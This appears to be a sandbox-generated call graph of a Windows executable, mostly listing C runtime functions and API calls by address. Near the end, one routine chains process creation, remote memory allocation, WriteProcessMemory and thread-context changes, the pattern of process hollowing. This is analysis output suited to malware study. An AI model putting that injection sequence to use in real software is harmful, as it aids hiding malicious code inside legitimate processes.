calls 9733->9741 9742 24e6cc ___std_exception_copy 48 API calls 9733->9742 9743 25268b 9733->9743 9735 24d37d CallUnexpected 48 API calls 9734->9735 9735->9737 9736 2500eb __freea 14 API calls 9736->9731 9738 24cdb6 __strnicoll 11 API calls 9737->9738 9739 2526ad 9738->9739 9740->9733 9741->9733 9742->9733 9743->9736 9745 2548ff 9744->9745 9746 2548f9 9744->9746 9762 254914 9745->9762 9749 255201 9746->9749 9750 2551b9 9746->9750 9782 255217 9749->9782 9752 2551bf 9750->9752 9753 2551dc 9750->9753 9755 250777 __strnicoll 14 API calls 9752->9755 9757 250777 __strnicoll 14 API calls 9753->9757 9761 2551fa 9753->9761 9754 2551cf 9754->9704 9756 2551c4 9755->9756 9758 24cd89 __strnicoll 48 API calls 9756->9758 9759 2551eb 9757->9759 9758->9754 9760 24cd89 __strnicoll 48 API calls 9759->9760 9760->9754 9761->9704 9763 24f8e8 __strnicoll 48 API calls 9762->9763 9764 25492a 9763->9764 9765 254946 9764->9765 9766 25495d 9764->9766 9776 25490f 9764->9776 9767 250777 __strnicoll 14 API calls 9765->9767 9769 254966 9766->9769 9770 254978 9766->9770 9768 25494b 9767->9768 9771 24cd89 __strnicoll 48 API calls 9768->9771 9772 250777 __strnicoll 14 API calls 9769->9772 9773 254985 9770->9773 9774 254998 9770->9774 9771->9776 9777 25496b 9772->9777 9778 255217 __strnicoll 48 API calls 9773->9778 9800 2552e2 9774->9800 9776->9704 9780 24cd89 __strnicoll 48 API calls 9777->9780 9778->9776 9780->9776 9781 250777 __strnicoll 14 API calls 9781->9776 9783 255227 9782->9783 9784 255241 9782->9784 9787 250777 __strnicoll 14 API calls 9783->9787 9785 255260 9784->9785 9786 255249 9784->9786 9789 255283 9785->9789 9790 25526c 9785->9790 9788 250777 __strnicoll 14 API calls 9786->9788 9791 25522c 9787->9791 9792 25524e 9788->9792 9797 24f8e8 __strnicoll 48 API calls 9789->9797 9798 255237 9789->9798 9793 250777 __strnicoll 14 API calls 9790->9793 9794 24cd89 __strnicoll 48 API calls 9791->9794 9795 24cd89 __strnicoll 48 API calls 9792->9795 9796 255271 9793->9796 9794->9798 9795->9798 9799 24cd89 __strnicoll 48 API calls 9796->9799 9797->9798 9798->9754 9799->9798 9801 24f8e8 __strnicoll 48 API calls 9800->9801 9802 2552f5 9801->9802 9805 255328 9802->9805 9808 25535c __strnicoll 9805->9808 9806 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 9807 2549ae 9806->9807 9807->9776 9807->9781 9809 2553dc 9808->9809 9810 2555c0 9808->9810 9812 2553c9 GetCPInfo 9808->9812 9813 2553e0 9808->9813 9811 250e0e __strnicoll MultiByteToWideChar 9809->9811 9809->9813 9814 255462 9811->9814 9812->9809 9812->9813 9813->9806 9813->9810 9814->9813 9815 255489 __alloca_probe_16 9814->9815 9816 250c65 __strnicoll 15 API calls 9814->9816 9820 2555b4 9814->9820 9818 250e0e __strnicoll MultiByteToWideChar 9815->9818 9815->9820 9816->9815 9817 250ced __freea 14 API calls 9817->9813 9819 2554d5 9818->9819 9819->9820 9821 250e0e __strnicoll MultiByteToWideChar 9819->9821 9820->9817 9822 2554f1 9821->9822 9822->9820 9823 2554ff 9822->9823 9824 255562 9823->9824 9825 250c65 __strnicoll 15 API calls 9823->9825 9828 255518 __alloca_probe_16 9823->9828 9826 250ced __freea 14 API calls 9824->9826 9825->9828 9827 255568 9826->9827 9829 250ced __freea 14 API calls 9827->9829 9828->9824 9830 250e0e __strnicoll MultiByteToWideChar 9828->9830 9829->9813 9831 25555b 9830->9831 9831->9824 9832 255584 9831->9832 9838 24ead5 9832->9838 9835 250ced __freea 14 API calls 9836 2555a4 9835->9836 9837 250ced __freea 14 API calls 9836->9837 9837->9813 9839 24ef5d __strnicoll 5 API calls 9838->9839 9840 24eae0 9839->9840 9841 24ecd9 __strnicoll 5 API calls 9840->9841 9843 24eae6 9840->9843 9842 24eb26 CompareStringW 9841->9842 9842->9843 9843->9835 9845 254723 9844->9845 9846 254738 HeapSize 9844->9846 9847 250777 __strnicoll 14 API calls 9845->9847 9846->9709 9848 254728 9847->9848 9849 24cd89 __strnicoll 48 API calls 9848->9849 9850 254733 9849->9850 9850->9709 9852 254763 9851->9852 9853 254758 9851->9853 9855 25476b 9852->9855 9861 254774 _unexpected 9852->9861 9854 250c65 __strnicoll 15 API calls 9853->9854 9859 254760 9854->9859 9856 2500eb __freea 14 API calls 9855->9856 9856->9859 9857 25479e HeapReAlloc 9857->9859 9857->9861 9858 254779 9860 250777 __strnicoll 14 API calls 9858->9860 9859->9713 9860->9859 9861->9857 9861->9858 9862 24c227 _unexpected 2 API calls 9861->9862 9862->9861 9864 24f8e8 __strnicoll 48 API calls 9863->9864 9865 2512a6 9864->9865 9866 2512b8 9865->9866 9871 24eab6 9865->9871 9868 25132c 9866->9868 9877 251502 9868->9877 9874 24ef43 9871->9874 9875 24eebe _unexpected 5 API calls 9874->9875 9876 24eabe 9875->9876 9876->9866 9878 251510 9877->9878 9879 25152a 9877->9879 9895 251312 9878->9895 9881 251531 9879->9881 9882 251550 9879->9882 9894 251344 9881->9894 9899 2512d3 9881->9899 9883 250e0e __strnicoll MultiByteToWideChar 9882->9883 9884 25155f 9883->9884 9886 251566 GetLastError 9884->9886 9888 25158c 9884->9888 9890 2512d3 15 API calls 9884->9890 9904 25079d 9886->9904 9891 250e0e __strnicoll MultiByteToWideChar 9888->9891 9888->9894 9890->9888 9892 2515a3 9891->9892 9892->9886 9892->9894 9893 250777 __strnicoll 14 API calls 9893->9894 9894->9719 9894->9720 9896 25131d 9895->9896 9897 251325 9895->9897 9898 2500eb __freea 14 API calls 9896->9898 9897->9894 9898->9897 9900 251312 14 API calls 9899->9900 9901 2512e1 9900->9901 9909 251275 9901->9909 9912 25078a 9904->9912 9906 2507a8 __dosmaperr 9907 250777 __strnicoll 14 API calls 9906->9907 9908 2507bb 9907->9908 9908->9893 9910 250c65 __strnicoll 15 API calls 9909->9910 9911 251282 9910->9911 9911->9894 9913 24f17b __dosmaperr 14 API calls 9912->9913 9914 25078f 9913->9914 9914->9906 9916 23ded0 std::_Throw_Cpp_error 9915->9916 9936 246e20 9916->9936 9919 23def0 9923 23df16 9919->9923 9921 24943d std::_Throw_Cpp_error 52 API calls 9922 23e00a GetCurrentThreadId 9921->9922 9922->9923 9923->9921 9923->9922 9924 23f70d 9923->9924 9927 24943d 52 API calls std::_Throw_Cpp_error 9923->9927 9928 23f701 9923->9928 10315 249972 WaitForSingleObjectEx 9923->10315 9925 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 9924->9925 9926 23de55 CreateEllipticRgn 9925->9926 9930 23f760 9926->9930 9927->9923 9929 24943d std::_Throw_Cpp_error 52 API calls 9928->9929 9929->9924 9934 23f780 9930->9934 9931 23f7e8 9932 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 9931->9932 9933 23de94 9932->9933 9933->8946 9934->9931 10320 24d48b 9934->10320 9937 246e4b std::_Throw_Cpp_error 9936->9937 9950 246f80 9937->9950 9939 246e5a 9958 24bd06 9939->9958 9941 246f44 9977 24943d 9941->9977 9943 246f5a 9983 2481a0 9943->9983 9947 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 9949 23de47 9947->9949 9948 246eaa 9948->9941 9948->9943 9973 248150 9948->9973 9949->9919 9956 24702b std::_Throw_Cpp_error 9950->9956 9951 2491e6 21 API calls std::_Throw_Cpp_error 9951->9956 9952 248006 9953 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 9952->9953 9955 248012 9953->9955 9954 248270 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9954->9956 9955->9939 9956->9951 9956->9952 9956->9954 9957 248980 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9956->9957 9957->9956 9959 24bd27 9958->9959 9960 24bd13 9958->9960 9989 24bd97 9959->9989 9961 250777 __strnicoll 14 API calls 9960->9961 9964 24bd18 9961->9964 9966 24cd89 __strnicoll 48 API calls 9964->9966 9965 24bd3c CreateThread 9967 24bd67 9965->9967 9968 24bd5b GetLastError 9965->9968 10006 24be20 9965->10006 9969 24bd23 9966->9969 9998 24bde7 9967->9998 9970 25079d __dosmaperr 14 API calls 9968->9970 9969->9948 9970->9967 9974 24817c 9973->9974 9975 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 9974->9975 9976 248189 9975->9976 9976->9948 9978 249453 std::_Throw_Cpp_error 9977->9978 10199 24969d 9978->10199 9984 2481c8 std::_Throw_Cpp_error 9983->9984 9986 248253 9984->9986 10311 249110 9984->10311 9987 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 9986->9987 9988 246f62 9987->9988 9988->9947 9990 250827 _unexpected 14 API calls 9989->9990 9991 24bda8 9990->9991 9992 2500eb __freea 14 API calls 9991->9992 9993 24bdb5 9992->9993 9994 24bdbc GetModuleHandleExW 9993->9994 9995 24bdd9 9993->9995 9994->9995 9996 24bde7 16 API calls 9995->9996 9997 24bd33 9996->9997 9997->9965 9997->9967 9999 24bdf3 9998->9999 10000 24bd72 9998->10000 10001 24be02 9999->10001 10002 24bdf9 CloseHandle 9999->10002 10000->9948 10003 24be11 10001->10003 10004 24be08 FreeLibrary 10001->10004 10002->10001 10005 2500eb __freea 14 API calls 10003->10005 10004->10003 10005->10000 10007 24be2c ___scrt_is_nonwritable_in_current_image 10006->10007 10008 24be40 10007->10008 10009 24be33 GetLastError ExitThread 10007->10009 10010 24f02a _unexpected 48 API calls 10008->10010 10011 24be45 10010->10011 10022 250996 10011->10022 10014 24be5c 10026 2480b0 10014->10026 10023 24be50 10022->10023 10024 2509a6 __CreateFrameInfo 10022->10024 10023->10014 10037 24ed0a 10023->10037 10024->10023 10043 24edb3 10024->10043 10046 248980 10026->10046 10028 2480dd std::_Throw_Cpp_error 10050 2490c0 10028->10050 10033 2481a0 5 API calls 10034 248116 10033->10034 10035 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10034->10035 10036 248125 10035->10036 10040 24bd89 10036->10040 10038 24eebe _unexpected 5 API calls 10037->10038 10039 24ed26 10038->10039 10039->10014 10187 24be9e 10040->10187 10044 24eebe _unexpected 5 API calls 10043->10044 10045 24edcf 10044->10045 10045->10023 10047 2489b5 10046->10047 10048 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10047->10048 10049 2489c5 10048->10049 10049->10028 10060 23c530 10050->10060 10082 23c785 10050->10082 10093 23dd90 GetPEB 10050->10093 10051 248109 10055 2498eb GetCurrentThreadId 10051->10055 10179 249ca6 10055->10179 10059 249904 __Mtx_unlock __Cnd_broadcast 10182 249cb2 10059->10182 10061 23c579 10060->10061 10078 23c71b 10060->10078 10063 23dc79 10061->10063 10070 23c59f 10061->10070 10061->10078 10062 23dd90 GetPEB 10110 24d4c7 10062->10110 10066 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10063->10066 10068 23dc85 10066->10068 10067 23c530 59 API calls 10069 23ddf6 10067->10069 10068->10051 10071 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10069->10071 10073 23d46e 10070->10073 10070->10078 10080 23c5d8 10070->10080 10072 23de02 10071->10072 10072->10051 10116 2380c0 10073->10116 10078->10051 10078->10062 10080->10078 10100 23a050 CreateFileA 10080->10100 10083 23c734 10082->10083 10084 23c751 10082->10084 10085 23a050 11 API calls 10083->10085 10084->10051 10086 23dd90 GetPEB 10084->10086 10085->10084 10087 24d4c7 50 API calls 10086->10087 10088 23dde2 10087->10088 10089 23c530 60 API calls 10088->10089 10090 23ddf6 10089->10090 10091 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10090->10091 10092 23de02 10091->10092 10092->10051 10094 24d4c7 50 API calls 10093->10094 10095 23dde2 10094->10095 10096 23c530 60 API calls 10095->10096 10097 23ddf6 10096->10097 10098 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10097->10098 10099 23de02 10098->10099 10099->10051 10102 23a0cd 10100->10102 10101 23a236 CloseHandle 10101->10102 10102->10101 10103 23b121 CloseHandle 10102->10103 10104 23b15f 10102->10104 10105 23a260 ReadFile 10102->10105 10108 23a1fe GetFileSize 10102->10108 10109 23b140 CloseHandle 10102->10109 10103->10102 10106 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10104->10106 10105->10102 10107 23b177 10106->10107 10107->10078 10108->10102 10109->10102 10111 24d4da __strnicoll 10110->10111 10134 24d557 10111->10134 10114 24cff7 __strnicoll 48 API calls 10115 23dde2 10114->10115 10115->10067 10158 242780 10116->10158 10118 2380ef std::_Throw_Cpp_error 10162 2427d0 10118->10162 10122 238134 std::_Throw_Cpp_error 10123 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10122->10123 10124 23814e 10123->10124 10125 231000 10124->10125 10126 231041 10125->10126 10170 235e40 10126->10170 10128 231536 10129 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10128->10129 10130 235e06 10129->10130 10131 238160 10130->10131 10173 23f820 10131->10173 10133 238176 10133->10078 10135 24d587 10134->10135 10136 24d5b4 10135->10136 10137 24d596 10135->10137 10148 24d58b 10135->10148 10139 24d5c1 10136->10139 10141 24d4fe ___scrt_uninitialize_crt 48 API calls 10136->10141 10138 24cf32 __strnicoll 29 API calls 10137->10138 10138->10148 10142 24d5f9 10139->10142 10143 24d5db 10139->10143 10140 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10146 24d4ec 10140->10146 10141->10139 10144 24d60d 10142->10144 10145 24d789 10142->10145 10147 252a39 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10143->10147 10144->10148 10150 24d6a7 10144->10150 10152 24d651 10144->10152 10145->10148 10149 252151 ___scrt_uninitialize_crt WideCharToMultiByte 10145->10149 10146->10114 10147->10148 10148->10140 10149->10148 10151 252151 ___scrt_uninitialize_crt WideCharToMultiByte 10150->10151 10154 24d6ba 10151->10154 10153 252151 ___scrt_uninitialize_crt WideCharToMultiByte 10152->10153 10153->10148 10154->10148 10155 24d6d3 GetLastError 10154->10155 10155->10148 10157 24d6e2 10155->10157 10156 252151 ___scrt_uninitialize_crt WideCharToMultiByte 10156->10157 10157->10148 10157->10156 10159 242796 std::_Throw_Cpp_error 10158->10159 10160 242880 std::_Throw_Cpp_error 5 API calls 10159->10160 10161 2427a1 10160->10161 10161->10118 10163 242813 std::_Throw_Cpp_error 10162->10163 10164 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10163->10164 10165 238126 10164->10165 10166 242830 10165->10166 10167 242851 std::_Throw_Cpp_error 10166->10167 10168 243770 std::_Throw_Cpp_error 51 API calls 10167->10168 10169 242873 10168->10169 10169->10122 10171 23fe20 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10170->10171 10172 235e4f 10171->10172 10172->10128 10174 23f844 std::_Throw_Cpp_error 10173->10174 10175 23f993 std::_Throw_Cpp_error 10174->10175 10178 23fa60 std::_Throw_Cpp_error 48 API calls 10174->10178 10176 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10175->10176 10177 23f9c9 10176->10177 10177->10133 10178->10174 10185 24a1fe EnterCriticalSection 10179->10185 10181 249cb0 10181->10059 10186 24a20c LeaveCriticalSection 10182->10186 10184 24810e 10184->10033 10185->10181 10186->10184 10188 24f17b __dosmaperr 14 API calls 10187->10188 10191 24bea9 10188->10191 10189 24beeb ExitThread 10190 24bec2 10193 24bece CloseHandle 10190->10193 10194 24bed5 10190->10194 10191->10189 10191->10190 10196 24ed45 10191->10196 10193->10194 10194->10189 10195 24bee1 FreeLibraryAndExitThread 10194->10195 10195->10189 10197 24eebe _unexpected 5 API calls 10196->10197 10198 24ed5e 10197->10198 10198->10190 10200 2496a9 __EH_prolog3_GS 10199->10200 10201 2380c0 std::_Throw_Cpp_error 51 API calls 10200->10201 10202 2496bd 10201->10202 10212 2495c6 10202->10212 10205 23f820 std::_Throw_Cpp_error 48 API calls 10206 2496da 10205->10206 10221 249bf9 10206->10221 10224 249306 10212->10224 10214 2495f7 10228 249553 10214->10228 10217 23f820 std::_Throw_Cpp_error 48 API calls 10218 249619 10217->10218 10219 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10218->10219 10220 249638 10219->10220 10220->10205 10222 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10221->10222 10223 249c03 10222->10223 10223->10223 10225 24931e 10224->10225 10226 249325 CatchIt 10225->10226 10240 245ed0 10225->10240 10226->10214 10229 24955f __EH_prolog3_GS 10228->10229 10231 24957e std::_Throw_Cpp_error 10229->10231 10281 24936e 10229->10281 10232 24936e std::_Throw_Cpp_error 51 API calls 10231->10232 10233 2495a3 10232->10233 10234 23f820 std::_Throw_Cpp_error 48 API calls 10233->10234 10235 2495ab std::_Throw_Cpp_error 10234->10235 10236 23f820 std::_Throw_Cpp_error 48 API calls 10235->10236 10237 2495be 10236->10237 10238 249bf9 std::_Throw_Cpp_error 5 API calls 10237->10238 10239 2495c5 std::domain_error::domain_error 10238->10239 10239->10217 10244 245ef1 10240->10244 10242 245feb 10243 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10242->10243 10245 245ffb 10243->10245 10244->10242 10247 246030 10244->10247 10255 2467d0 10244->10255 10245->10226 10251 2460a3 10247->10251 10248 2467d0 std::_Throw_Cpp_error 21 API calls 10248->10251 10249 2461f6 10250 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10249->10250 10252 2467bf 10250->10252 10251->10248 10251->10249 10258 2467f0 10251->10258 10262 24cd99 10251->10262 10252->10244 10267 2491e6 10255->10267 10257 2467e7 10257->10244 10259 2467fe std::_Throw_Cpp_error 10258->10259 10260 24aa1c std::_Throw_Cpp_error RaiseException 10259->10260 10261 246816 10260->10261 10263 24d0bf __strnicoll 48 API calls 10262->10263 10264 24cda8 10263->10264 10265 24cdb6 __strnicoll 11 API calls 10264->10265 10266 24cdb5 10265->10266 10270 2491eb 10267->10270 10268 24d3e7 ___std_exception_copy 15 API calls 10268->10270 10269 249205 10269->10257 10270->10268 10270->10269 10271 24c227 _unexpected EnterCriticalSection LeaveCriticalSection 10270->10271 10272 249207 std::_Throw_Cpp_error 10270->10272 10271->10270 10274 24aa1c std::_Throw_Cpp_error RaiseException 10272->10274 10276 2499e1 std::_Throw_Cpp_error 10272->10276 10273 24aa1c std::_Throw_Cpp_error RaiseException 10275 2499fe IsProcessorFeaturePresent 10273->10275 10274->10276 10278 249a14 10275->10278 10276->10273 10279 249af9 ___raise_securityfailure SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10278->10279 10280 249af7 10279->10280 10280->10257 10282 2493af 10281->10282 10284 249385 CatchIt 10281->10284 10285 24978d 10282->10285 10284->10231 10286 2497b2 10285->10286 10287 249848 10285->10287 10296 245780 10286->10296 10308 245420 10287->10308 10292 245ed0 std::_Throw_Cpp_error 51 API calls 10293 2497ce CatchIt 10292->10293 10295 24981a CatchIt 10293->10295 10302 23fad0 10293->10302 10295->10284 10301 245c55 10296->10301 10297 245590 std::_Throw_Cpp_error 5 API calls 10297->10301 10298 245e9d 10299 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10298->10299 10300 245eb0 10299->10300 10300->10292 10301->10297 10301->10298 10304 23faf4 10302->10304 10303 23fba0 std::_Throw_Cpp_error 48 API calls 10303->10304 10304->10303 10305 23fb73 std::_Throw_Cpp_error 10304->10305 10306 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10305->10306 10307 23fb91 10306->10307 10307->10295 10309 249866 std::_Xinvalid_argument 50 API calls 10308->10309 10310 245432 10309->10310 10312 249134 10311->10312 10313 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10312->10313 10314 2491b6 10313->10314 10314->9984 10316 249988 GetExitCodeThread 10315->10316 10317 2499ba 10315->10317 10316->10317 10318 249999 CloseHandle 10316->10318 10317->9923 10318->9923 10321 24d497 ___scrt_is_nonwritable_in_current_image 10320->10321 10322 24f02a _unexpected 48 API calls 10321->10322 10325 24d49c 10322->10325 10323 24d37d CallUnexpected 48 API calls 10324 24d4c6 10323->10324 10325->10323 10327 24ba9d 10326->10327 10328 24baaf ___scrt_uninitialize_crt 10326->10328 10329 24baab 10327->10329 10331 2504c7 10327->10331 10328->8961 10329->8961 10334 2505f2 10331->10334 10337 2506cb 10334->10337 10338 2506d7 ___scrt_is_nonwritable_in_current_image 10337->10338 10345 24d181 EnterCriticalSection 10338->10345 10340 2506e1 ___scrt_uninitialize_crt 10341 25074d 10340->10341 10346 25063f 10340->10346 10354 25076b 10341->10354 10345->10340 10347 25064b ___scrt_is_nonwritable_in_current_image 10346->10347 10357 24bb0f EnterCriticalSection 10347->10357 10349 25068e 10371 2506bf 10349->10371 10350 250655 ___scrt_uninitialize_crt 10350->10349 10358 2504d0 10350->10358 10470 24d198 LeaveCriticalSection 10354->10470 10356 2504ce 10356->10329 10357->10350 10359 2504e5 __strnicoll 10358->10359 10360 2504f7 10359->10360 10361 2504ec 10359->10361 10374 250535 10360->10374 10362 2505f2 ___scrt_uninitialize_crt 77 API calls 10361->10362 10364 2504f2 10362->10364 10366 24cff7 __strnicoll 48 API calls 10364->10366 10367 25052f 10366->10367 10367->10349 10369 250518 10387 25313f 10369->10387 10469 24bb23 LeaveCriticalSection 10371->10469 10373 2506ad 10373->10340 10375 25054e 10374->10375 10379 250501 10374->10379 10376 252956 ___scrt_uninitialize_crt 48 API calls 10375->10376 10375->10379 10377 25056a 10376->10377 10398 25347a 10377->10398 10379->10364 10380 252956 10379->10380 10381 252977 10380->10381 10382 252962 10380->10382 10381->10369 10383 250777 __strnicoll 14 API calls 10382->10383 10384 252967 10383->10384 10385 24cd89 __strnicoll 48 API calls 10384->10385 10386 252972 10385->10386 10386->10369 10388 253150 10387->10388 10389 25315d 10387->10389 10390 250777 __strnicoll 14 API calls 10388->10390 10391 2531a6 10389->10391 10393 253184 10389->10393 10397 253155 10390->10397 10392 250777 __strnicoll 14 API calls 10391->10392 10394 2531ab 10392->10394 10439 2531bc 10393->10439 10396 24cd89 __strnicoll 48 API calls 10394->10396 10396->10397 10397->10364 10401 253486 ___scrt_is_nonwritable_in_current_image 10398->10401 10399 25348e 10399->10379 10400 2534c7 10402 24cf32 __strnicoll 29 API calls 10400->10402 10401->10399 10401->10400 10403 25350d 10401->10403 10402->10399 10409 2528f7 EnterCriticalSection 10403->10409 10405 253513 10407 253531 10405->10407 10410 25325e 10405->10410 10436 253583 10407->10436 10409->10405 10413 253286 10410->10413 10434 2532a9 ___scrt_uninitialize_crt 10410->10434 10411 25328a 10412 24cf32 __strnicoll 29 API calls 10411->10412 10412->10434 10413->10411 10414 2532e5 10413->10414 10415 253303 10414->10415 10417 254a71 ___scrt_uninitialize_crt 50 API calls 10414->10417 10416 25358b ___scrt_uninitialize_crt 49 API calls 10415->10416 10418 253315 10416->10418 10417->10415 10419 253362 10418->10419 10420 25331b 10418->10420 10423 253376 10419->10423 10424 2533cb WriteFile 10419->10424 10421 253323 10420->10421 10422 25334a 10420->10422 10431 2539cf ___scrt_uninitialize_crt 6 API calls 10421->10431 10421->10434 10425 253608 ___scrt_uninitialize_crt 54 API calls 10422->10425 10427 2533b7 10423->10427 10428 25337e 10423->10428 10426 2533ed GetLastError 10424->10426 10424->10434 10425->10434 10426->10434 10432 253a37 ___scrt_uninitialize_crt 7 API calls 10427->10432 10429 2533a3 10428->10429 10430 253383 10428->10430 10433 253bfb ___scrt_uninitialize_crt 8 API calls 10429->10433 10430->10434 10435 253b12 ___scrt_uninitialize_crt 7 API calls 10430->10435 10431->10434 10432->10434 10433->10434 10434->10407 10435->10434 10437 25291a ___scrt_uninitialize_crt LeaveCriticalSection 10436->10437 10438 253589 10437->10438 10438->10399 10440 2531c8 ___scrt_is_nonwritable_in_current_image 10439->10440 10452 2528f7 EnterCriticalSection 10440->10452 10442 2531d7 10450 25321c 10442->10450 10453 2526ae 10442->10453 10444 250777 __strnicoll 14 API calls 10446 253223 10444->10446 10445 253203 FlushFileBuffers 10445->10446 10447 25320f GetLastError 10445->10447 10466 253252 10446->10466 10448 25078a __dosmaperr 14 API calls 10447->10448 10448->10450 10450->10444 10452->10442 10454 2526bb 10453->10454 10456 2526d0 10453->10456 10455 25078a __dosmaperr 14 API calls 10454->10455 10458 2526c0 10455->10458 10457 25078a __dosmaperr 14 API calls 10456->10457 10461 2526f5 10456->10461 10459 252700 10457->10459 10460 250777 __strnicoll 14 API calls 10458->10460 10462 250777 __strnicoll 14 API calls 10459->10462 10463 2526c8 10460->10463 10461->10445 10464 252708 10462->10464 10463->10445 10465 24cd89 __strnicoll 48 API calls 10464->10465 10465->10463 10467 25291a ___scrt_uninitialize_crt LeaveCriticalSection 10466->10467 10468 25323b 10467->10468 10468->10397 10469->10373 10470->10356 10471 26018d 10472 2601c3 10471->10472 10473 260310 GetPEB 10472->10473 10474 260322 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 10472->10474 10473->10474 10474->10472 10475 2603c9 WriteProcessMemory 10474->10475 10476 26040e 10475->10476 10477 260413 WriteProcessMemory 10476->10477 10478 260450 WriteProcessMemory Wow64SetThreadContext ResumeThread 10476->10478 10477->10476 8729 23a010 8730 23a03b 8729->8730 8733 24bef5 8730->8733 8736 24c040 8733->8736 8737 24c06d 8736->8737 8738 24c07f 8736->8738 8763 24a40c GetModuleHandleW 8737->8763 8748 24c1da 8738->8748 8743 23a04f 8747 24c0d1 8749 24c1e6 ___scrt_is_nonwritable_in_current_image 8748->8749 8771 24d181 EnterCriticalSection 8749->8771 8751 24c1f0 8772 24c0d7 8751->8772 8753 24c1fd 8776 24c21b 8753->8776 8756 24c00f 8833 24bff6 8756->8833 8758 24c019 8759 24c02d 8758->8759 8760 24c01d GetCurrentProcess TerminateProcess 8758->8760 8761 24bf74 __CreateFrameInfo 3 API calls 8759->8761 8760->8759 8762 24c035 ExitProcess 8761->8762 8764 24a418 8763->8764 8764->8738 8765 24bf74 GetModuleHandleExW 8764->8765 8766 24bfd4 8765->8766 8767 24bfb3 GetProcAddress 8765->8767 8768 24bfe3 8766->8768 8769 24bfda FreeLibrary 8766->8769 8767->8766 8770 24bfc7 8767->8770 8768->8738 8769->8768 8770->8766 8771->8751 8774 24c0e3 ___scrt_is_nonwritable_in_current_image __CreateFrameInfo 8772->8774 8773 24c147 __CreateFrameInfo 8773->8753 8774->8773 8779 24c78b 8774->8779 8832 24d198 LeaveCriticalSection 8776->8832 8778 24c0b6 8778->8743 8778->8756 8780 24c797 __EH_prolog3 8779->8780 8783 24ca16 8780->8783 8782 24c7be __CreateFrameInfo 8782->8773 8784 24ca22 ___scrt_is_nonwritable_in_current_image 8783->8784 8791 24d181 EnterCriticalSection 8784->8791 8786 24ca30 8792 24c8e1 8786->8792 8791->8786 8793 24c900 8792->8793 8794 24c8f8 8792->8794 8793->8794 8799 2500eb 8793->8799 8796 24ca65 8794->8796 8831 24d198 LeaveCriticalSection 8796->8831 8798 24ca4e 8798->8782 8800 2500f6 RtlFreeHeap 8799->8800 8801 250120 8799->8801 8800->8801 8802 25010b GetLastError 8800->8802 8801->8794 8803 250118 __dosmaperr 8802->8803 8805 250777 8803->8805 8808 24f17b GetLastError 8805->8808 8807 25077c 8807->8801 8809 24f191 8808->8809 8810 24f197 8808->8810 8811 24ebb0 _unexpected 6 API calls 8809->8811 8812 24ebef _unexpected 6 API calls 8810->8812 8814 24f19b SetLastError 8810->8814 8811->8810 8813 24f1b3 8812->8813 8813->8814 8816 250827 _unexpected 12 API calls 8813->8816 8814->8807 8817 24f1c8 8816->8817 8818 24f1d0 8817->8818 8819 24f1e1 8817->8819 8820 24ebef _unexpected 6 API calls 8818->8820 8821 24ebef _unexpected 6 API calls 8819->8821 8822 24f1de 8820->8822 8823 24f1ed 8821->8823 8827 2500eb __freea 12 API calls 8822->8827 8824 24f1f1 8823->8824 8825 24f208 8823->8825 8826 24ebef _unexpected 6 API calls 8824->8826 8828 24f33c _unexpected 12 API calls 8825->8828 8826->8822 8827->8814 8829 24f213 8828->8829 8830 2500eb __freea 12 API calls 8829->8830 8830->8814 8831->8798 8832->8778 8836 25096f 8833->8836 8835 24bffb __CreateFrameInfo 8835->8758 8837 25097e __CreateFrameInfo 8836->8837 8838 25098b 8837->8838 8840 24ed73 8837->8840 8838->8835 8843 24eebe 8840->8843 8844 24eeee 8843->8844 8847 24ed8f 8843->8847 8844->8847 8850 24edf3 8844->8850 8847->8838 8848 24ef08 GetProcAddress 8848->8847 8849 24ef18 _unexpected 8848->8849 8849->8847 8856 24ee04 ___vcrt_FlsGetValue 8850->8856 8851 24ee9a 8851->8847 8851->8848 8852 24ee22 LoadLibraryExW 8853 24eea1 